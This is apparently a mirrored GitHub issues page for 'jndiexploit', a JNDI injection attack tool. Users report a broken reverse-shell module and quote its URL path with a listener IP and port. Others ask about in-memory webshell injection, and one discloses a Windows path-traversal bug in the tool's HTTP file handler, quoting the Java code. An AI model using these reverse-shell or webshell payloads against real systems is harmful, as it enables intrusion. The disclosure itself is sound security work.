GithubHelp home page GithubHelp logo

jndiexploit's Issues

ReverseShell获取的shell模块不工作

image

使用这个模块时无法获取shell,或者说获取的shell不工作 /TomcatBypass/ReverseShell/192.168.1.100/4448

上网大概了解了下,可能是这个原因
image

报错

image
xiang'we想问一下这个报错是什么原因

1.4版本在Windows下存在路径穿越漏洞

The http server will be started by default,The corresponding code for the tool http server is located in the project."src/main/java/com/feihong/ldap/HTTPServer.java"
When the suffix name does not belong to any of the if else, it will enter handleFileRequest.

 private static void handleFileRequest(HttpExchange exchange) throws Exception {
        String path = exchange.getRequestURI().getPath();
        String filename =  cwd + File.separator + "data" + File.separator +path.substring(path.lastIndexOf("/") + 1);
        File file = new File(filename);
        if (file.exists()){
            byte[] bytes = new byte[(int) file.length()];
            FileInputStream fileInputStream = new FileInputStream(file);
            fileInputStream.read(bytes);
            exchange.sendResponseHeaders(200, file.length() + 1);
            exchange.getResponseBody().write(bytes);
        }else {
            System.out.println("[!] Response Code: " + 404);
            exchange.sendResponseHeaders(404, 0);
        }
        exchange.close();

    }

It will get the last / and splice it with the current pwd, but in the Windows system, the path is represented by , so running the tool on Windows will cause the corresponding arbitrary file to be read.
Here I use python to attack
image
You can see that the file contents are returned. And I do have this file in my d drive
image

关于冰蝎内存马

师傅你好。我想问问有没有适合这个工具冰蝎内存马注入的漏洞靶场,我试了几个靶场可能是环境问题,都没有连接上冰蝎

0

0

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.